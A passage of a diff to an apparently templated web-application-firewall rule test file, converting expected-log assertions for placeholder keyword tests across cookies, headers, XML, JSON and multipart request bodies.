+ method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: skeletonkeyword=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - test: skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 6 desc: "XML element includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" - output: - no_log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" + output: + no_log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 7 desc: "XML attribute name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" - output: - no_log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" + output: + no_log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 8 desc: "XML attribute value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 9 desc: "XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 10 desc: "Nested XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 11 desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 12 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"skeletonkeyword\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 13 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"skeletonkeyword\": \"test\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" + output: + log: + expect_ids: [skeletonid]